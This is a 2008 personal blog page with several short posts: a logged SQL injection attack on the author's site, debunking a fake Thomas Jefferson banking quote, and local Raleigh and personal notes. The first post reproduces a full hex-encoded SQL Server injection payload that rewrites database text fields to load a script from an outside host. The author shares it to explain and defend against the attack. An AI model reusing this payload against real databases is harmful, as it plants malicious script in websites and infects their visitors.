Blog SQL injection attack

I’ve been logging a few attacks on my blog site which put the following into the logfiles:

163.19.104.88 – – [02/Oct/2008:05:57:15 -0400] “GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1” 200 42469 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)”

Turns out its a SQL injection attack which is allegedly being carried out by a criminal gang called Rock Phish (or its being carried out by two teenagers pretending to be a “gang”). The attack uses WAITFOR DELAY to see if it worked or not. The user agent and IP addresses change for each attack, so one has to be clever in defending against it. I’ve been blocking the IP when it comes up, but that becomes impractical after a while.
Continue reading →

Tracing the bogus Thomas Jefferson bank quote

As mentioned in the previous post, a quote attributed to Thomas Jefferson is being bandied about now that the bank bailout is in the news. The quote is:

â€œI believe that banking institutions are more dangerous to our liberties than standing armies. If the American people ever allow private banks to control the issue of their currency, first by inflation, then by deflation, the banks and corporations that will grow up around [the banks] will deprive the people of all property until their children wake-up homeless on the continent their fathers conquered.â€ – Thomas Jefferson to Albert Gallatin, 1802

I thought the quote was fishy-sounding, so I did some Googling tonight to find where it came from. The first step was to search on a unique snippet of the quote. Out of 220 Google results on “continent their fathers conquered” I found a slew of results from this year (and especially last month), but many without listed dates. How far back could I trace it?
Continue reading →

Bogus Thomas Jefferson quote

I found this quote supposedly by Thomas Jefferson floating around the Internet:

“I believe that banking institutions are more dangerous to our liberties than standing armies. If the American people ever allow private banks to control the issue of their currency, first by inflation, then by deflation, the banks and corporations that will grow up around [the banks] will deprive the people of all property until their children wake-up homeless on the continent their fathers conquered.” – Thomas Jefferson to Albert Gallatin, 1802

While a bit poetic, I think the quote is fabricated. The folks at Snopes think its bogus. It also doesn’t appear on UVa’s Thomas Jefferson Quotation Page.

Just like the Einstein Bee quote, someone used Jefferson’s stature to prop up their modern-day argument. Continue reading →

Highway horses

Watching a police officer ride on horseback through downtown this afternoon got me wondering: what are the laws about horses on public streets? Still legal? I imagine there was never a defined point where cars became kings of the road.

Any horse experts want to weigh in?

Outlook: snarky

When my officemate threw up his hands in frustration one time too many after Microsoft Outlook crashed, I felt the need to send a happygram to Bill Gates. Feeling prankish, I rattled off this email:

—–Original Message—–
From: Mark Turner [mailto:jmarkturner at blah blah blah . com]
Sent: Monday, September 29, 2008 00:23 AM
To: Bill Gates
Subject: Thanks!

Mr. Gates,

Thanks so much for creating Microsoft Outlook. My life is so much better because of it.

Best Regards,

Mark Turner
Raleigh, NC

I about fell out of my chair laughing when I got this response back from his administrative staff just now:
Continue reading →

Post traumatic stress disorder

Words can’t express how sad this is. I hope Mr. Cummings recovers and finds the peace and the help he needs.

Raleigh’s rad new skatepark: Marsh Creek

I attended the groundbreaking ceremony at the Marsh Creek Skate Park this morning. It was my first ceremony as a Parks Board member. Board chair Eugene Weeks was the only other member present.

The park itself will be a jewel for the skateboarding kids of Raleigh. We’re not talking a few plywood half-pipes nailed together but an X-Games-worthy arena. What I didn’t see in the amazing renderings of the park is where the bleachers will be. I may be too old (and, uh, clumsy) to be catching air on a skateboard but I’d love to sit and watch!

To serve most of the kids who will use it, the park will need the CAT 15C bus route adjusted. Its just too far of the bus route as it stands. I attempted to ride the bus to the park this morning until GoTriangle.Org told me it would take an hour to get there. No thanks: I can walk faster. In fact, a half-mile walk was part of the route GoTriangle provided. Total buzz kill, dude.

Anyway, if gravity’s really holding you back then Marsh Creek will soon be your place.

Can’t get there from here

Looks like when the market tanked today it took The Google’s memory of my neighborhood with it. Typing my address into Google maps once showed me where I live. Not anymore. I’ve become a non-place.

I can understand how my neighborhood, being about two years old, might take a while to get into Google. Its kinda strange to have it in there and then have it dropped, however.

Why can’t Wake County’s Property Tax records work this way?

USS Elliot decomissioning video

I spent a moment last night watching the USS Elliot DD-967 Decommissioning Video that Ens. Jeff Underwood (now of MissionMediaUSA) was selling at the ceremony in December 2003. The video doesn’t show the decommissioning but it does show some of the ship and interviews from the last crew. Jeff gave me permission to post a copy of it, so I put it here. Its an MPEG4 file shrunk to … um, 160 megabytes, so start the download and go take a nap while it completes. You’ll probably only want to watch this if you served on the Elliot, truth be told.

I also went hunting and think I found a photograph from Elliot’s last day. A midshipman there for summer training posted pictures from the SINKEX that day. I originally thought the ship in the middle of this picture might be Elliot under tow, but its more likely another ship lining up to take a shot at Elliot.

The L word

Wachovia is being bought by CitiGroup. A CitiGroup spokeswoman declined to speak about layoffs, but the company “expects to realize more than $3 billion of annualized expense synergies through the consolidation of overlapping functions.”

Those of you who play Buzzword Bingo know that anywhere the word “synergies” appears it is never good news. And let’s consider “consolidation of overlapping functions.” Hmm. What could this describe … let me think … perhaps … um, layoffs!?!

I feel for my friends over at Wachovia. At the same time I know I would’ve left a long time ago: corporate doublespeak and I don’t get along.